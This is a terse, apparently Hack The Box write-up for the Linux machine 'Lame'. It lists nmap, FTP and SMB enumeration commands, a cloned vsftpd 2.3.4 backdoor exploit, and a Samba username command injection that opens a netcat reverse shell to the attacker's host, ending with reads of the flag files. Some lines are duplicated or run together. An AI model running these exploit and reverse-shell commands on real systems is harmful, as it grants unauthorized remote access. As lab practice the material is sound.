Lame
#Linux #Enumeration #FTP #SMB
Gather Information
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts





Exploitation





Last updated
#Linux #Enumeration #FTP #SMB
nmap -p- --open -T5 -v -n 10.129.223.149 -oG AllPorts










Last updated
nmap -sCV -p 21,22,139,445,3632 10.129.223.149 -oN Targetftp 10.129.223.149 # user : anonymous , pass : anonymouscrackmapexec smb 10.129.223.149
smbmap -H 10.129.223.149smbclient -L 10.129.223.149 -Nsmbclient //10.129.223.129/tmp -Ngit clone https://github.com/ahervias77/vsftpd-2.3.4-exploit
cd vsftpd-2.3.4-exploit
batcat vsftpd_234_exploit.pypython3 vsftpd_234_exploit.py 10.129.223.149 21 whoamibatcat 16320.rbnc - nlvp 443smbclient //10.129.223.149/tmp -N --option='client min protocol=NT1'
logon "/=`nohup nc -e /bin/sh 10.10.14.49 443 `"script /dev/null -c bash
cat /home/makis/user.txt
cat /root/root.txt